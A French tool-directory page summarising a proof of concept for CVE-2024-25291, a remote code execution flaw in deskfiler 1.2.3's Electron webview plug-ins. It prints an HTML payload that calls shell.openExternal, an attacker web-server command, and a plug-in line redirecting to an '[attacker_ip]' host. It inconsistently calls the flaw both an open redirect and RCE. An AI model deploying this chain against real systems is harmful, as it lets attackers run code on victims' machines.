Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-25291 — deskfiler 1.2.3 Open Redirect exploit | Kitploit
Outils/GitHubGitHub/eqstlab/cve-2024-25291
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubeqstlab/cve-2024-25291

CVE-2024-25291

deskfiler 1.2.3 Open Redirect exploit

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

DeskFiler RCE

Une preuve de concept pour la vulnérabilité CVE-2024-25291.

deskfiler - 1.2.3 permet d'utiliser Electron webview dans l'application, ce qui entraîne l'exécution de code à distance. Dans ce dépôt, il y a un exemple d'application vulnérable et une preuve de concept (POC) d'exploitation.

En tant que PoC, il y a un fichier Python qui automatise le processus.

1. Aperçu de la vulnérabilité :

  • Sujet de la vulnérabilité : Redirection ouverte via RCE
  • Version vulnérable : deskfiler-1.2.3
  • Manifestation du problème : Electron Webview
  • Type d'attaque : Exécution de code à distance
  • Vecteurs d'attaque : Pour exploiter la vulnérabilité, quelqu'un doit ouvrir le plug-in.
  • Numéro CVE réservé : CVE-2024-25291

2. Cause de la vulnérabilité :

  • Explication de l'exploit
    • Dans une section spécifique de l'application, une section accédant à un lien externe via une Webview à travers Electron a pu être confirmée. Par conséquent, grâce à cela, il est possible d'obtenir une RCE en se connectant au serveur de l'attaquant.

Preuve de concept (POC)

  • Étape 1) Préparer le serveur de l'attaquant et créer un plug-in malveillant.
root@kitploit:~
<html>
 <head>
 <title>jruru</title>
 </head>
 <body>
 <script>
 const { shell } = require('electron');
 shell.openExternal('file:C:/Windows/System32/calc.exe');
 </script>
 </body>
 </html>

※ Si vous voulez le tester rapidement, créez un serveur sur le PC de l'attaquant avec le code suivant.

root@kitploit:~
$ python -m http.server 80

Remarque : ※ À ce stade, il est supposé que le plug-in est un plug-in généré par l'attaquant, et qu'il s'agit seulement d'un plug-in normal avec un code ajouté pour permettre l'accès au serveur de l'attaquant. BareBone a été sélectionné pour des tests simples. deskfiler1

Ensuite, ajoutez le code suivant au fichier index.js dans le chemin du dossier BareBone.

root@kitploit:~
window.location='http://[attacker_ip]/hack.html'
  • Étape 2) Sur le serveur de la victime, exécutez Deskfiler et installez le plug-in BareBone via "Ajouter un nouveau plug-in". deskfiler2

deskfiler3


3. Informations supplémentaires

Dans cette PoC, nous avons utilisé un plug-in ; cependant, nous pensons qu'avec des vecteurs d'attaque alternatifs, il est possible d'obtenir une exécution de code à distance (RCE) de manière indépendante. De plus, si des vulnérabilités côté serveur telles que XSS stocké, XSS réfléchi existent, la RCE est également considérée comme réalisable.

Télécharger l’outil